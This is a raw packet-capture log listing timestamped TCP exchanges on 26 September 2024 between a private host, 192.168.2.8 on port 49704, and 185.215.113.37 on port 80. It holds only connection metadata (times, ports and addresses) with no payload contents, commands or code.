Sep 26, 2024 06:00:20.938136101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938148022 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938158035 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938164949 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938164949 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938177109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938183069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938191891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938209057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938215017 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938227892 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938235998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938251972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938256979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938261986 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938272953 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938281059 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938291073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938302040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938308001 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938322067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938328028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938340902 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938349962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938357115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938369989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938380003 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938386917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938399076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938407898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938415051 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938424110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938438892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938445091 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938452959 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938461065 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938471079 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938479900 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938493013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938498020 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938508034 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938517094 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938524008 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938533068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938541889 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938549995 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938565969 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938571930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938580036 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938589096 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938597918 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938606977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938620090 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938625097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938636065 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938642979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938649893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938657999 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938668966 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938676119 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938688040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938693047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938705921 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938709974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938720942 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938725948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938734055 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938747883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938755035 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938764095 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938772917 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938781023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938792944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938801050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938811064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938818932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938832998 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938838005 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938846111 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938853979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938860893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938869953 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938880920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938888073 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938898087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938910007 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938918114 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938926935 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938936949 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938944101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938956976 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938961983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938971996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.938978910 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.938993931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939002991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939013958 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939028025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939034939 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939045906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939055920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939064026 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939074993 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939080954 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939090967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939097881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939109087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939117908 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939131021 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939137936 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939146996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939155102 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939167976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939173937 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939182997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939189911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:20.939197063 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:20.939222097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047755957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047777891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047789097 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047800064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047812939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047826052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047842026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047848940 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047861099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047873020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047883987 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047902107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047914028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047924042 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047924042 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047935963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047944069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047954082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047965050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.047983885 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.047990084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048012018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048017025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048041105 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048058033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048063993 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048073053 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048085928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048096895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048105955 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048115015 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048132896 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048149109 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048156977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048168898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048176050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048185110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048197031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048207998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048216105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048227072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048235893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048245907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048261881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048268080 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048278093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048285961 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048295975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048307896 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048314095 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048324108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048341990 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048352957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048361063 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048371077 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048382044 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048388958 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048403025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048408985 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048418999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048425913 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048434973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048444033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048459053 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048464060 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048474073 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048480988 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048490047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048508883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048521996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048531055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048548937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048553944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048563004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048573017 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048582077 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048590899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048604012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048609018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048621893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048631907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048640013 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048649073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048660040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048671007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048681021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048690081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048698902 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048711061 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048717022 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048727036 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048739910 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048744917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048755884 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048765898 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048774958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048787117 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048794031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048805952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048816919 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048824072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048834085 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048842907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048854113 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048861027 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048875093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048880100 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048891068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048896074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048906088 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048914909 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048927069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048932076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048942089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048954010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048964977 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048964977 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048975945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.048985004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.048991919 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049001932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049014091 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049020052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049032927 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049040079 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049050093 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049057961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049068928 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049077034 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049088001 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049093008 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049108028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049115896 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049123049 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049132109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049145937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049151897 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049164057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049169064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049177885 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049185991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049201012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049206972 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049215078 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049221992 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049232006 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049240112 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049249887 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049261093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049269915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049271107 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049283028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049290895 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049319029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049407005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049417973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049427986 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049439907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049446106 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049454927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049468994 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049478054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049488068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049494982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049505949 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049515963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049524069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049534082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049550056 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049559116 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049570084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049582958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049591064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049591064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049607992 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049612999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049622059 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049628019 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049635887 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049644947 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049657106 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049663067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049675941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049683094 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049694061 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049711943 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049717903 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049730062 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049741030 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049751997 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049766064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049773932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049784899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049796104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049808979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049820900 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049827099 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049837112 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049844980 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049854994 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049863100 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049875975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049880981 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049890995 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049896002 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049906015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049913883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049925089 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049932003 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049946070 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049952984 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049962997 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049978971 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.049984932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.049984932 CEST	49704	80	192.168.2.8	185.215.113.37
